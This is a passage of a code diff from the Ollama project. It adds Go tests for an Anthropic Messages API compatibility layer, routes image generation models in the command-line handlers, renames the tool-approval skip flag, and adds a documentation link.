|
||||
if result.Options["top_p"] != 0.9 {
|
||||
t.Errorf("expected top_p 0.9, got %v", result.Options["top_p"])
|
||||
}
|
||||
if result.Options["top_k"] != 40 {
|
||||
t.Errorf("expected top_k 40, got %v", result.Options["top_k"])
|
||||
}
|
||||
if diff := cmp.Diff([]string{"\n", "END"}, result.Options["stop"]); diff != "" {
|
||||
t.Errorf("stop sequences mismatch: %s", diff)
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_WithImage(t *testing.T) {
|
||||
imgData, _ := base64.StdEncoding.DecodeString(testImage)
|
||||
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{
|
||||
{
|
||||
Role: "user",
|
||||
Content: []any{
|
||||
map[string]any{"type": "text", "text": "What's in this image?"},
|
||||
map[string]any{
|
||||
"type": "image",
|
||||
"source": map[string]any{
|
||||
"type": "base64",
|
||||
"media_type": "image/png",
|
||||
"data": testImage,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if len(result.Messages) != 1 {
|
||||
t.Fatalf("expected 1 message, got %d", len(result.Messages))
|
||||
}
|
||||
|
||||
if result.Messages[0].Content != "What's in this image?" {
|
||||
t.Errorf("expected content 'What's in this image?', got %q", result.Messages[0].Content)
|
||||
}
|
||||
|
||||
if len(result.Messages[0].Images) != 1 {
|
||||
t.Fatalf("expected 1 image, got %d", len(result.Messages[0].Images))
|
||||
}
|
||||
|
||||
if string(result.Messages[0].Images[0]) != string(imgData) {
|
||||
t.Error("image data mismatch")
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_WithToolUse(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{
|
||||
{Role: "user", Content: "What's the weather in Paris?"},
|
||||
{
|
||||
Role: "assistant",
|
||||
Content: []any{
|
||||
map[string]any{
|
||||
"type": "tool_use",
|
||||
"id": "call_123",
|
||||
"name": "get_weather",
|
||||
"input": map[string]any{"location": "Paris"},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if len(result.Messages) != 2 {
|
||||
t.Fatalf("expected 2 messages, got %d", len(result.Messages))
|
||||
}
|
||||
|
||||
if len(result.Messages[1].ToolCalls) != 1 {
|
||||
t.Fatalf("expected 1 tool call, got %d", len(result.Messages[1].ToolCalls))
|
||||
}
|
||||
|
||||
tc := result.Messages[1].ToolCalls[0]
|
||||
if tc.ID != "call_123" {
|
||||
t.Errorf("expected tool call ID 'call_123', got %q", tc.ID)
|
||||
}
|
||||
if tc.Function.Name != "get_weather" {
|
||||
t.Errorf("expected tool name 'get_weather', got %q", tc.Function.Name)
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_WithToolResult(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{
|
||||
{
|
||||
Role: "user",
|
||||
Content: []any{
|
||||
map[string]any{
|
||||
"type": "tool_result",
|
||||
"tool_use_id": "call_123",
|
||||
"content": "The weather in Paris is sunny, 22°C",
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if len(result.Messages) != 1 {
|
||||
t.Fatalf("expected 1 message, got %d", len(result.Messages))
|
||||
}
|
||||
|
||||
msg := result.Messages[0]
|
||||
if msg.Role != "tool" {
|
||||
t.Errorf("expected role 'tool', got %q", msg.Role)
|
||||
}
|
||||
if msg.ToolCallID != "call_123" {
|
||||
t.Errorf("expected tool_call_id 'call_123', got %q", msg.ToolCallID)
|
||||
}
|
||||
if msg.Content != "The weather in Paris is sunny, 22°C" {
|
||||
t.Errorf("unexpected content: %q", msg.Content)
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_WithTools(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{{Role: "user", Content: "Hello"}},
|
||||
Tools: []Tool{
|
||||
{
|
||||
Name: "get_weather",
|
||||
Description: "Get current weather",
|
||||
InputSchema: json.RawMessage(`{"type":"object","properties":{"location":{"type":"string"}},"required":["location"]}`),
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if len(result.Tools) != 1 {
|
||||
t.Fatalf("expected 1 tool, got %d", len(result.Tools))
|
||||
}
|
||||
|
||||
tool := result.Tools[0]
|
||||
if tool.Type != "function" {
|
||||
t.Errorf("expected type 'function', got %q", tool.Type)
|
||||
}
|
||||
if tool.Function.Name != "get_weather" {
|
||||
t.Errorf("expected name 'get_weather', got %q", tool.Function.Name)
|
||||
}
|
||||
if tool.Function.Description != "Get current weather" {
|
||||
t.Errorf("expected description 'Get current weather', got %q", tool.Function.Description)
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_WithThinking(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{{Role: "user", Content: "Hello"}},
|
||||
Thinking: &ThinkingConfig{Type: "enabled", BudgetTokens: 1000},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Think == nil {
|
||||
t.Fatal("expected Think to be set")
|
||||
}
|
||||
if v, ok := result.Think.Value.(bool); !ok || !v {
|
||||
t.Errorf("expected Think.Value to be true, got %v", result.Think.Value)
|
||||
}
|
||||
}
|
||||
|
||||
// TestFromMessagesRequest_ThinkingOnlyBlock verifies that messages containing only
|
||||
// a thinking block (no text, images, or tool calls) are preserved and not dropped.
|
||||
func TestFromMessagesRequest_ThinkingOnlyBlock(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{
|
||||
{Role: "user", Content: "Hello"},
|
||||
{
|
||||
Role: "assistant",
|
||||
Content: []any{
|
||||
map[string]any{
|
||||
"type": "thinking",
|
||||
"thinking": "Let me think about this...",
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if len(result.Messages) != 2 {
|
||||
t.Fatalf("expected 2 messages, got %d", len(result.Messages))
|
||||
}
|
||||
|
||||
assistantMsg := result.Messages[1]
|
||||
if assistantMsg.Thinking != "Let me think about this..." {
|
||||
t.Errorf("expected thinking content, got %q", assistantMsg.Thinking)
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_ToolUseMissingID(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{
|
||||
{
|
||||
Role: "assistant",
|
||||
Content: []any{
|
||||
map[string]any{
|
||||
"type": "tool_use",
|
||||
"name": "get_weather",
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
_, err := FromMessagesRequest(req)
|
||||
if err == nil {
|
||||
t.Fatal("expected error for missing tool_use id")
|
||||
}
|
||||
if err.Error() != "tool_use block missing required 'id' field" {
|
||||
t.Errorf("unexpected error message: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_ToolUseMissingName(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{
|
||||
{
|
||||
Role: "assistant",
|
||||
Content: []any{
|
||||
map[string]any{
|
||||
"type": "tool_use",
|
||||
"id": "call_123",
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
_, err := FromMessagesRequest(req)
|
||||
if err == nil {
|
||||
t.Fatal("expected error for missing tool_use name")
|
||||
}
|
||||
if err.Error() != "tool_use block missing required 'name' field" {
|
||||
t.Errorf("unexpected error message: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_InvalidToolSchema(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{{Role: "user", Content: "Hello"}},
|
||||
Tools: []Tool{
|
||||
{
|
||||
Name: "bad_tool",
|
||||
InputSchema: json.RawMessage(`{invalid json`),
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
_, err := FromMessagesRequest(req)
|
||||
if err == nil {
|
||||
t.Fatal("expected error for invalid tool schema")
|
||||
}
|
||||
}
|
||||
|
||||
func TestToMessagesResponse_Basic(t *testing.T) {
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
Content: "Hello there!",
|
||||
},
|
||||
Done: true,
|
||||
DoneReason: "stop",
|
||||
Metrics: api.Metrics{
|
||||
PromptEvalCount: 10,
|
||||
EvalCount: 5,
|
||||
},
|
||||
}
|
||||
|
||||
result := ToMessagesResponse("msg_123", resp)
|
||||
|
||||
if result.ID != "msg_123" {
|
||||
t.Errorf("expected ID 'msg_123', got %q", result.ID)
|
||||
}
|
||||
if result.Type != "message" {
|
||||
t.Errorf("expected type 'message', got %q", result.Type)
|
||||
}
|
||||
if result.Role != "assistant" {
|
||||
t.Errorf("expected role 'assistant', got %q", result.Role)
|
||||
}
|
||||
if len(result.Content) != 1 {
|
||||
t.Fatalf("expected 1 content block, got %d", len(result.Content))
|
||||
}
|
||||
if result.Content[0].Type != "text" || result.Content[0].Text == nil || *result.Content[0].Text != "Hello there!" {
|
||||
t.Errorf("unexpected content: %+v", result.Content[0])
|
||||
}
|
||||
if result.StopReason != "end_turn" {
|
||||
t.Errorf("expected stop_reason 'end_turn', got %q", result.StopReason)
|
||||
}
|
||||
if result.Usage.InputTokens != 10 || result.Usage.OutputTokens != 5 {
|
||||
t.Errorf("unexpected usage: %+v", result.Usage)
|
||||
}
|
||||
}
|
||||
|
||||
func TestToMessagesResponse_WithToolCalls(t *testing.T) {
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{
|
||||
ID: "call_123",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: testArgs(map[string]any{"location": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
Done: true,
|
||||
DoneReason: "stop",
|
||||
}
|
||||
|
||||
result := ToMessagesResponse("msg_123", resp)
|
||||
|
||||
if len(result.Content) != 1 {
|
||||
t.Fatalf("expected 1 content block, got %d", len(result.Content))
|
||||
}
|
||||
if result.Content[0].Type != "tool_use" {
|
||||
t.Errorf("expected type 'tool_use', got %q", result.Content[0].Type)
|
||||
}
|
||||
if result.Content[0].ID != "call_123" {
|
||||
t.Errorf("expected ID 'call_123', got %q", result.Content[0].ID)
|
||||
}
|
||||
if result.Content[0].Name != "get_weather" {
|
||||
t.Errorf("expected name 'get_weather', got %q", result.Content[0].Name)
|
||||
}
|
||||
if result.StopReason != "tool_use" {
|
||||
t.Errorf("expected stop_reason 'tool_use', got %q", result.StopReason)
|
||||
}
|
||||
}
|
||||
|
||||
func TestToMessagesResponse_WithThinking(t *testing.T) {
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
Content: "The answer is 42.",
|
||||
Thinking: "Let me think about this...",
|
||||
},
|
||||
Done: true,
|
||||
DoneReason: "stop",
|
||||
}
|
||||
|
||||
result := ToMessagesResponse("msg_123", resp)
|
||||
|
||||
if len(result.Content) != 2 {
|
||||
t.Fatalf("expected 2 content blocks, got %d", len(result.Content))
|
||||
}
|
||||
if result.Content[0].Type != "thinking" {
|
||||
t.Errorf("expected first block type 'thinking', got %q", result.Content[0].Type)
|
||||
}
|
||||
if result.Content[0].Thinking == nil || *result.Content[0].Thinking != "Let me think about this..." {
|
||||
t.Errorf("unexpected thinking content: %v", result.Content[0].Thinking)
|
||||
}
|
||||
if result.Content[1].Type != "text" {
|
||||
t.Errorf("expected second block type 'text', got %q", result.Content[1].Type)
|
||||
}
|
||||
}
|
||||
|
||||
func TestMapStopReason(t *testing.T) {
|
||||
tests := []struct {
|
||||
reason string
|
||||
hasToolCalls bool
|
||||
want string
|
||||
}{
|
||||
{"stop", false, "end_turn"},
|
||||
{"length", false, "max_tokens"},
|
||||
{"stop", true, "tool_use"},
|
||||
{"other", false, "stop_sequence"},
|
||||
{"", false, ""},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
got := mapStopReason(tt.reason, tt.hasToolCalls)
|
||||
if got != tt.want {
|
||||
t.Errorf("mapStopReason(%q, %v) = %q, want %q", tt.reason, tt.hasToolCalls, got, tt.want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestNewError(t *testing.T) {
|
||||
tests := []struct {
|
||||
code int
|
||||
want string
|
||||
}{
|
||||
{400, "invalid_request_error"},
|
||||
{401, "authentication_error"},
|
||||
{403, "permission_error"},
|
||||
{404, "not_found_error"},
|
||||
{429, "rate_limit_error"},
|
||||
{500, "api_error"},
|
||||
{503, "overloaded_error"},
|
||||
{529, "overloaded_error"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
result := NewError(tt.code, "test message")
|
||||
if result.Type != "error" {
|
||||
t.Errorf("NewError(%d) type = %q, want 'error'", tt.code, result.Type)
|
||||
}
|
||||
if result.Error.Type != tt.want {
|
||||
t.Errorf("NewError(%d) error.type = %q, want %q", tt.code, result.Error.Type, tt.want)
|
||||
}
|
||||
if result.Error.Message != "test message" {
|
||||
t.Errorf("NewError(%d) message = %q, want 'test message'", tt.code, result.Error.Message)
|
||||
}
|
||||
if result.RequestID == "" {
|
||||
t.Errorf("NewError(%d) request_id should not be empty", tt.code)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestGenerateMessageID(t *testing.T) {
|
||||
id1 := GenerateMessageID()
|
||||
id2 := GenerateMessageID()
|
||||
|
||||
if id1 == "" {
|
||||
t.Error("GenerateMessageID returned empty string")
|
||||
}
|
||||
if id1 == id2 {
|
||||
t.Error("GenerateMessageID returned duplicate IDs")
|
||||
}
|
||||
if len(id1) < 10 {
|
||||
t.Errorf("GenerateMessageID returned short ID: %q", id1)
|
||||
}
|
||||
if id1[:4] != "msg_" {
|
||||
t.Errorf("GenerateMessageID should start with 'msg_', got %q", id1[:4])
|
||||
}
|
||||
}
|
||||
|
||||
func TestStreamConverter_Basic(t *testing.T) {
|
||||
conv := NewStreamConverter("msg_123", "test-model")
|
||||
|
||||
// First chunk
|
||||
resp1 := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
Content: "Hello",
|
||||
},
|
||||
Metrics: api.Metrics{PromptEvalCount: 10},
|
||||
}
|
||||
|
||||
events1 := conv.Process(resp1)
|
||||
if len(events1) < 3 {
|
||||
t.Fatalf("expected at least 3 events for first chunk, got %d", len(events1))
|
||||
}
|
||||
|
||||
// Should have message_start, content_block_start, content_block_delta
|
||||
if events1[0].Event != "message_start" {
|
||||
t.Errorf("expected first event 'message_start', got %q", events1[0].Event)
|
||||
}
|
||||
if events1[1].Event != "content_block_start" {
|
||||
t.Errorf("expected second event 'content_block_start', got %q", events1[1].Event)
|
||||
}
|
||||
if events1[2].Event != "content_block_delta" {
|
||||
t.Errorf("expected third event 'content_block_delta', got %q", events1[2].Event)
|
||||
}
|
||||
|
||||
// Final chunk
|
||||
resp2 := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
Content: " world!",
|
||||
},
|
||||
Done: true,
|
||||
DoneReason: "stop",
|
||||
Metrics: api.Metrics{EvalCount: 5},
|
||||
}
|
||||
|
||||
events2 := conv.Process(resp2)
|
||||
|
||||
// Should have content_block_delta, content_block_stop, message_delta, message_stop
|
||||
hasStop := false
|
||||
for _, e := range events2 {
|
||||
if e.Event == "message_stop" {
|
||||
hasStop = true
|
||||
}
|
||||
}
|
||||
if !hasStop {
|
||||
t.Error("expected message_stop event in final chunk")
|
||||
}
|
||||
}
|
||||
|
||||
func TestStreamConverter_WithToolCalls(t *testing.T) {
|
||||
conv := NewStreamConverter("msg_123", "test-model")
|
||||
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{
|
||||
ID: "call_123",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: testArgs(map[string]any{"location": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
Done: true,
|
||||
DoneReason: "stop",
|
||||
Metrics: api.Metrics{PromptEvalCount: 10, EvalCount: 5},
|
||||
}
|
||||
|
||||
events := conv.Process(resp)
|
||||
|
||||
hasToolStart := false
|
||||
hasToolDelta := false
|
||||
for _, e := range events {
|
||||
if e.Event == "content_block_start" {
|
||||
if start, ok := e.Data.(ContentBlockStartEvent); ok {
|
||||
if start.ContentBlock.Type == "tool_use" {
|
||||
hasToolStart = true
|
||||
}
|
||||
}
|
||||
}
|
||||
if e.Event == "content_block_delta" {
|
||||
if delta, ok := e.Data.(ContentBlockDeltaEvent); ok {
|
||||
if delta.Delta.Type == "input_json_delta" {
|
||||
hasToolDelta = true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if !hasToolStart {
|
||||
t.Error("expected tool_use content_block_start event")
|
||||
}
|
||||
if !hasToolDelta {
|
||||
t.Error("expected input_json_delta event")
|
||||
}
|
||||
}
|
||||
|
||||
func TestStreamConverter_ToolCallWithUnmarshalableArgs(t *testing.T) {
|
||||
// Test that unmarshalable arguments (like channels) are handled gracefully
|
||||
// and don't cause a panic or corrupt stream
|
||||
conv := NewStreamConverter("msg_123", "test-model")
|
||||
|
||||
// Create a channel which cannot be JSON marshaled
|
||||
unmarshalable := make(chan int)
|
||||
badArgs := api.NewToolCallFunctionArguments()
|
||||
badArgs.Set("channel", unmarshalable)
|
||||
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{
|
||||
ID: "call_bad",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "bad_function",
|
||||
Arguments: badArgs,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
Done: true,
|
||||
DoneReason: "stop",
|
||||
}
|
||||
|
||||
// Should not panic and should skip the unmarshalable tool call
|
||||
events := conv.Process(resp)
|
||||
|
||||
// Verify no tool_use block was started (since marshal failed before block start)
|
||||
hasToolStart := false
|
||||
for _, e := range events {
|
||||
if e.Event == "content_block_start" {
|
||||
if start, ok := e.Data.(ContentBlockStartEvent); ok {
|
||||
if start.ContentBlock.Type == "tool_use" {
|
||||
hasToolStart = true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if hasToolStart {
|
||||
t.Error("expected no tool_use block when arguments cannot be marshaled")
|
||||
}
|
||||
}
|
||||
|
||||
func TestStreamConverter_MultipleToolCallsWithMixedValidity(t *testing.T) {
|
||||
// Test that valid tool calls still work when mixed with invalid ones
|
||||
conv := NewStreamConverter("msg_123", "test-model")
|
||||
|
||||
unmarshalable := make(chan int)
|
||||
badArgs := api.NewToolCallFunctionArguments()
|
||||
badArgs.Set("channel", unmarshalable)
|
||||
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{
|
||||
ID: "call_good",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "good_function",
|
||||
Arguments: testArgs(map[string]any{"location": "Paris"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
ID: "call_bad",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "bad_function",
|
||||
Arguments: badArgs,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
Done: true,
|
||||
DoneReason: "stop",
|
||||
}
|
||||
|
||||
events := conv.Process(resp)
|
||||
|
||||
// Count tool_use blocks - should only have 1 (the valid one)
|
||||
toolStartCount := 0
|
||||
toolDeltaCount := 0
|
||||
for _, e := range events {
|
||||
if e.Event == "content_block_start" {
|
||||
if start, ok := e.Data.(ContentBlockStartEvent); ok {
|
||||
if start.ContentBlock.Type == "tool_use" {
|
||||
toolStartCount++
|
||||
if start.ContentBlock.Name != "good_function" {
|
||||
t.Errorf("expected tool name 'good_function', got %q", start.ContentBlock.Name)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if e.Event == "content_block_delta" {
|
||||
if delta, ok := e.Data.(ContentBlockDeltaEvent); ok {
|
||||
if delta.Delta.Type == "input_json_delta" {
|
||||
toolDeltaCount++
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if toolStartCount != 1 {
|
||||
t.Errorf("expected 1 tool_use block, got %d", toolStartCount)
|
||||
}
|
||||
if toolDeltaCount != 1 {
|
||||
t.Errorf("expected 1 input_json_delta, got %d", toolDeltaCount)
|
||||
}
|
||||
}
|
||||
|
||||
// TestContentBlockJSON_EmptyFieldsPresent verifies that empty text and thinking fields
|
||||
// are serialized in JSON output. The Anthropic SDK requires these fields to be present
|
||||
// (even when empty) in content_block_start events to properly accumulate streaming deltas.
|
||||
// Without these fields, the SDK throws: "TypeError: unsupported operand type(s) for +=: 'NoneType' and 'str'"
|
||||
func TestContentBlockJSON_EmptyFieldsPresent(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
block ContentBlock
|
||||
wantKeys []string
|
||||
}{
|
||||
{
|
||||
name: "text block includes empty text field",
|
||||
block: ContentBlock{
|
||||
Type: "text",
|
||||
Text: ptr(""),
|
||||
},
|
||||
wantKeys: []string{"type", "text"},
|
||||
},
|
||||
{
|
||||
name: "thinking block includes empty thinking field",
|
||||
block: ContentBlock{
|
||||
Type: "thinking",
|
||||
Thinking: ptr(""),
|
||||
},
|
||||
wantKeys: []string{"type", "thinking"},
|
||||
},
|
||||
{
|
||||
name: "text block with content",
|
||||
block: ContentBlock{
|
||||
Type: "text",
|
||||
Text: ptr("hello"),
|
||||
},
|
||||
wantKeys: []string{"type", "text"},
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
data, err := json.Marshal(tt.block)
|
||||
if err != nil {
|
||||
t.Fatalf("failed to marshal: %v", err)
|
||||
}
|
||||
|
||||
var result map[string]any
|
||||
if err := json.Unmarshal(data, &result); err != nil {
|
||||
t.Fatalf("failed to unmarshal: %v", err)
|
||||
}
|
||||
|
||||
for _, key := range tt.wantKeys {
|
||||
if _, ok := result[key]; !ok {
|
||||
t.Errorf("expected key %q to be present in JSON output, got: %s", key, string(data))
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestStreamConverter_ContentBlockStartIncludesEmptyFields verifies that content_block_start
|
||||
// events include the required empty fields for SDK compatibility.
|
||||
func TestStreamConverter_ContentBlockStartIncludesEmptyFields(t *testing.T) {
|
||||
t.Run("text block start includes empty text", func(t *testing.T) {
|
||||
conv := NewStreamConverter("msg_123", "test-model")
|
||||
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{Role: "assistant", Content: "hello"},
|
||||
}
|
||||
|
||||
events := conv.Process(resp)
|
||||
|
||||
var foundTextStart bool
|
||||
for _, e := range events {
|
||||
if e.Event == "content_block_start" {
|
||||
if start, ok := e.Data.(ContentBlockStartEvent); ok {
|
||||
if start.ContentBlock.Type == "text" {
|
||||
foundTextStart = true
|
||||
// Marshal and verify the text field is present
|
||||
data, _ := json.Marshal(start)
|
||||
var result map[string]any
|
||||
json.Unmarshal(data, &result)
|
||||
cb := result["content_block"].(map[string]any)
|
||||
if _, ok := cb["text"]; !ok {
|
||||
t.Error("content_block_start for text should include 'text' field")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if !foundTextStart {
|
||||
t.Error("expected text content_block_start event")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("thinking block start includes empty thinking", func(t *testing.T) {
|
||||
conv := NewStreamConverter("msg_123", "test-model")
|
||||
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{Role: "assistant", Thinking: "let me think..."},
|
||||
}
|
||||
|
||||
events := conv.Process(resp)
|
||||
|
||||
var foundThinkingStart bool
|
||||
for _, e := range events {
|
||||
if e.Event == "content_block_start" {
|
||||
if start, ok := e.Data.(ContentBlockStartEvent); ok {
|
||||
if start.ContentBlock.Type == "thinking" {
|
||||
foundThinkingStart = true
|
||||
data, _ := json.Marshal(start)
|
||||
var result map[string]any
|
||||
json.Unmarshal(data, &result)
|
||||
cb := result["content_block"].(map[string]any)
|
||||
if _, ok := cb["thinking"]; !ok {
|
||||
t.Error("content_block_start for thinking should include 'thinking' field")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if !foundThinkingStart {
|
||||
t.Error("expected thinking content_block_start event")
|
||||
}
|
||||
})
|
||||
}
|
||||
27
cmd/cmd.go
27
cmd/cmd.go
@@ -46,6 +46,8 @@ import (
|
||||
"github.com/ollama/ollama/types/syncmap"
|
||||
"github.com/ollama/ollama/version"
|
||||
xcmd "github.com/ollama/ollama/x/cmd"
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
imagegenclient "github.com/ollama/ollama/x/imagegen/client"
|
||||
)
|
||||
|
||||
const ConnectInstructions = "To sign in, navigate to:\n %s\n\n"
|
||||
@@ -96,6 +98,10 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
|
||||
filename, err := getModelfileName(cmd)
|
||||
if os.IsNotExist(err) {
|
||||
if filename == "" {
|
||||
// No Modelfile found - check if current directory is an image gen model
|
||||
if imagegen.IsTensorModelDir(".") {
|
||||
return imagegenclient.CreateModel(args[0], ".", p)
|
||||
}
|
||||
reader = strings.NewReader("FROM .\n")
|
||||
} else {
|
||||
return errModelfileNotFound
|
||||
@@ -457,6 +463,15 @@ func RunHandler(cmd *cobra.Command, args []string) error {
|
||||
}
|
||||
|
||||
name := args[0]
|
||||
|
||||
// Check if this is a known image generation model (skip Show/Pull)
|
||||
if imagegen.HasTensorLayers(name) {
|
||||
if opts.Prompt == "" && !interactive {
|
||||
return errors.New("image generation models require a prompt. Usage: ollama run " + name + " \"your prompt here\"")
|
||||
}
|
||||
return imagegen.RunCLI(cmd, name, opts.Prompt, interactive, opts.KeepAlive)
|
||||
}
|
||||
|
||||
info, err := func() (*api.ShowResponse, error) {
|
||||
showReq := &api.ShowRequest{Name: name}
|
||||
info, err := client.Show(cmd.Context(), showReq)
|
||||
@@ -520,7 +535,7 @@ func RunHandler(cmd *cobra.Command, args []string) error {
|
||||
|
||||
// Check for experimental flag
|
||||
isExperimental, _ := cmd.Flags().GetBool("experimental")
|
||||
yoloMode, _ := cmd.Flags().GetBool("yolo")
|
||||
yoloMode, _ := cmd.Flags().GetBool("experimental-yolo")
|
||||
|
||||
if interactive {
|
||||
if err := loadOrUnloadModel(cmd, &opts); err != nil {
|
||||
@@ -822,6 +837,11 @@ func DeleteHandler(cmd *cobra.Command, args []string) error {
|
||||
}
|
||||
|
||||
func ShowHandler(cmd *cobra.Command, args []string) error {
|
||||
// Check if this is an image generation model
|
||||
if imagegen.HasTensorLayers(args[0]) {
|
||||
return imagegen.Show(args[0], os.Stdout)
|
||||
}
|
||||
|
||||
client, err := api.ClientFromEnvironment()
|
||||
if err != nil {
|
||||
return err
|
||||
@@ -1765,7 +1785,10 @@ func NewCLI() *cobra.Command {
|
||||
runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
|
||||
runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
|
||||
runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
|
||||
runCmd.Flags().BoolP("yolo", "y", false, "Skip all tool approval prompts (use with caution)")
|
||||
runCmd.Flags().Bool("experimental-yolo", false, "Skip all tool approval prompts (use with caution)")
|
||||
|
||||
// Image generation flags (width, height, steps, seed, etc.)
|
||||
imagegen.RegisterFlags(runCmd)
|
||||
|
||||
stopCmd := &cobra.Command{
|
||||
Use: "stop MODEL",
|
||||
|
||||
@@ -14,6 +14,7 @@
|
||||
* [API Reference](https://docs.ollama.com/api)
|
||||
* [Modelfile Reference](https://docs.ollama.com/modelfile)
|
||||
* [OpenAI Compatibility](https://docs.ollama.com/api/openai-compatibility)
|
||||
* [Anthropic Compatibility](./api/anthropic-compatibility.mdx)
|
||||
|
||||
### Resources
|
||||
|
||||
|
||||
